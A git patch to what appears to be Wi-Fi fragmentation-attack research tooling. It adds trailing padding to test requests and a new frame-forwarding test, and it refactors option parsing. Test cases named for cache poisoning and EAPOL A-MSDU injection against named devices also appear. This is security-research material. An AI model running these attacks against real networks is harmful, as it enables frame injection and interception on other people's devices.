From 609e44b1b8381553fa8ab856a7adb92ae7fa668b Mon Sep 17 00:00:00 2001 From: Mathy Date: Wed, 29 Apr 2020 18:40:41 -0400 Subject: [PATCH] fragattacks: ability to add trailing data --- research/fragattack.py | 108 ++++++++++++++++++++++++----------------- 1 file changed, 64 insertions(+), 44 deletions(-) diff --git a/research/fragattack.py b/research/fragattack.py index fa7ec2b56..e5f030ee7 100755 --- a/research/fragattack.py +++ b/research/fragattack.py @@ -130,7 +130,7 @@ def freebsd_encap_eapolmsdu(p, src, dst, payload): # ignored ICMP and ARP packets. REQ_ARP, REQ_ICMP, REQ_DHCP = range(3) -def generate_request(sta, ptype, prior=2, icmp_size=None): +def generate_request(sta, ptype, prior=2, icmp_size=None, padding=None): header = sta.get_header(prior=prior) if ptype == REQ_ARP: # Avoid using sta.get_peermac() because the correct MAC addresses may not @@ -159,6 +159,9 @@ def generate_request(sta, ptype, prior=2, icmp_size=None): # We assume DHCP discover is sent towards the AP. header.addr3 = "ff:ff:ff:ff:ff:ff" + if padding != None and padding >= 1: + request = raw(request) + b"\x00" + b"A" * (padding - 1) + return header, request, check class Action(): @@ -275,7 +278,7 @@ class Test(metaclass=abc.ABCMeta): def check(self, p): return False - def set_options(self, delay=None, inc_pn=None): + def set_general_options(self, delay=None, inc_pn=None): self.delay = delay self.inc_pn = inc_pn @@ -296,14 +299,16 @@ class Test(metaclass=abc.ABCMeta): frag.inc_pn = self.inc_pn class PingTest(Test): - def __init__(self, ptype, fragments, bcast=False, separate_with=None, as_msdu=False, icmp_size=None): + def __init__(self, ptype, fragments, separate_with=None, opt=None): super().__init__(fragments) self.ptype = ptype - self.bcast = bcast self.separate_with = separate_with self.check_fn = None - self.as_msdu = as_msdu - self.icmp_size = icmp_size + + self.bcast = False if opt == None else opt.bcast + self.as_msdu = False if opt == None else opt.as_msdu + self.icmp_size = None if opt == None else opt.icmp_size + self.padding = None if opt == None else opt.padding def check(self, p): if self.check_fn == None: @@ -314,7 +319,7 @@ class PingTest(Test): log(STATUS, "Generating ping test", color="green") # Generate the header and payload - header, request, self.check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size) + header, request, self.check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size, padding=self.padding) if self.as_msdu == 1: # Set the A-MSDU frame type flag in the QoS header @@ -365,6 +370,26 @@ class PingTest(Test): self.actions.insert(i, sep_frag) +class ForwardTest(Test): + def __init__(self): + super().__init__([ + Action(Action.Connected, enc=True) + ]) + self.magic = b"reflected_data" + + def check(self, p): + return self.magic in raw(p) + + def prepare(self, station): + # We assume we are targetting the AP + header = station.get_header(prior=2) + assert header.FCfield & Dot11(FCfield="to-DS").FCfield != 0 + + # Set final destination to be us, the client + header.addr3 = station.mac + + self.actions[0].frame = header/LLC()/SNAP()/IP()/Raw(self.magic) + class LinuxTest(Test): def __init__(self, ptype, decoy_tid=None): super().__init__([ @@ -830,7 +855,7 @@ class Daemon(metaclass=abc.ABCMeta): self.options = options # Note: some kernels don't support interface names of 15+ characters - self.nic_iface = options.interface + self.nic_iface = options.iface self.nic_mon = "mon" + self.nic_iface[:12] self.process = None @@ -1313,17 +1338,18 @@ def stract2action(stract): raise Exception("Unrecognized action") -def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=None, bcast=False, icmp_size=None): - if test_name == "ping": +def prepare_tests(opt): + stractions = opt.actions + if opt.testname == "ping": if stractions != None: actions = [stract2action(stract) for stract in stractions.split(",")] else: actions = [Action(Action.Connected, action=Action.GetIp), Action(Action.Connected, enc=True)] - test = PingTest(REQ_ICMP, actions, as_msdu=as_msdu, bcast=bcast, icmp_size=icmp_size) + test = PingTest(REQ_ICMP, actions, opt=opt) - elif test_name == "ping_frag_sep": + elif opt.testname == "ping_frag_sep": # Check if we can send frames in between fragments. The seperator by default uses a different # QoS TID. The second fragment must use an incremental PN compared to the first fragment. # So this also tests if the receivers uses a per-QoS receive replay counter. By overriding @@ -1334,10 +1360,9 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype= [Action(Action.Connected, action=Action.GetIp), Action(Action.Connected, enc=True), Action(Action.Connected, enc=True, inc_pn=0)], - separate_with=separator, as_msdu=as_msdu, bcast=bcast, icmp_size=icmp_size - ) + separate_with=separator, opt=opt) - elif test_name == "wep_mixed_key": + elif opt.testname == "wep_mixed_key": log(WARNING, "Cannot predict WEP key reotation. Fragment may time out, use very short key rotation!", color="orange") test = PingTest(REQ_ICMP, [Action(Action.Connected, action=Action.GetIp), @@ -1346,17 +1371,21 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype= Action(Action.AfterAuth, enc=True), ]) - elif test_name == "cache_poison": + elif opt.testname == "cache_poison": # Cache poison attack. Worked against Linux Hostapd and RT-AC51U. test = PingTest(REQ_ICMP, [Action(Action.Connected, enc=True), Action(Action.Connected, action=Action.Reconnect), Action(Action.AfterAuth, enc=True)]) - elif test_name == "eapol_msdu": + elif opt.testname == "forward": + test = ForwardTest() + + elif opt.testname == "eapol_msdu": freebsd = False if stractions != None: # TODO: Clean up this parsing / specification + stractions = stractions if stractions.startswith("M,"): freebsd = True stractions = stractions[2:] @@ -1371,11 +1400,11 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype= test = EapolMsduTest(REQ_ICMP, actions, freebsd) - elif test_name == "linux_plain": + elif opt.testname == "linux_plain": decoy_tid = None if stractions == None else int(stractions) test = LinuxTest(REQ_ICMP, decoy_tid) - elif test_name == "macos": + elif opt.testname == "macos": if stractions != None: actions = [Action(char2trigger(t), enc=False) for t in stractions] else: @@ -1384,13 +1413,13 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype= test = MacOsTest(REQ_ICMP, actions) - elif test_name == "qca_test": + elif opt.testname == "qca_test": test = QcaDriverTest() - elif test_name == "qca_split": + elif opt.testname == "qca_split": test = QcaTestSplit() - elif test_name == "qca_rekey": + elif opt.testname == "qca_rekey": test = QcaDriverRekey() # No valid test ID/name was given @@ -1416,14 +1445,14 @@ def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype= # - Test fragmentation of group frames (STA mode of RT-AC51u?) # If requested, override delay and inc_pn parameters in the test. - test.set_options(delay, inc_pn) + test.set_general_options(opt.delay, opt.inc_pn) # If requested, override the ptype - if ptype != None: + if opt.ptype != None: if not hasattr(test, "ptype"): log(WARNING, "Cannot override request type of the selected test.") quit(1) - test.ptype = ptype + test.ptype = opt.ptype return test @@ -1470,6 +1499,7 @@ if __name__ == "__main__": parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.") parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.") parser.add_argument('--icmp-size', type=int, default=None, help="Second to wait after AfterAuth before triggering Connected event") + parser.add_argument('--padding', type=int, default=None, help="Add padding data to ARP/DHCP/ICMP requests.") parser.add_argument('--rekey-request', default=False, action='store_true', help="Actively request PTK rekey as client.") parser.add_argument('--rekey-plaintext', default=False, action='store_true', help="Do PTK rekey with plaintext EAPOL frames.") parser.add_argument('--rekey-early-install', default=False, action='store_true', help="Install PTK after sending Msg3 during rekey.") @@ -1478,34 +1508,24 @@ if __name__ == "__main__": parser.add_argument('--pn-per-qos', default=False, action='store_true', help="Use separate Tx packet counter for each QoS TID.") parser.add_argument('--freebsd-cache', default=False, action='store_true', help="Sent EAP(OL) frames as (malformed) broadcast EAPOL/A-MSDUs.") parser.add_argument('--connected-delay', type=int, default=1, help="Second to wait after AfterAuth before triggering Connected event") - args = parser.parse_args() + options = parser.parse_args() - ptype = args2ptype(args) - as_msdu = args2msdu(args) + # Sanity check and convert some arguments to more usable form + options.ptype = args2ptype(options) + options.as_msdu = args2msdu(options) - # Convert parsed options to TestOptions object - options = TestOptions() - options.interface = args.iface - options.ip = args.ip - options.peerip = args.peerip - options.rekey_request = args.rekey_request - options.rekey_plaintext = args.rekey_plaintext - options.rekey_early_install = args.rekey_early_install - options.full_reconnect = args.full_reconnect - options.pn_per_qos = args.pn_per_qos - options.freebsd_cache = args.freebsd_cache - options.connected_delay = args.connected_delay - options.test = prepare_tests(args.testname, args.actions, args.delay, args.inc_pn, as_msdu, ptype, args.bcast, args.icmp_size) + # Construct the test + options.test = prepare_tests(options) if options.test == None: - log(STATUS, f"Test name/id '{args.testname}' not recognized. Specify a valid test case.") + log(STATUS, f"Test name/id '{options.testname}' not recognized. Specify a valid test case.") quit(1) # Parse remaining options - global_log_level -= args.debug + global_log_level -= options.debug # Now start the tests --- TODO: Inject Deauths before connecting with client... - if args.ap: + if options.ap: daemon = Authenticator(options) else: daemon = Supplicant(options)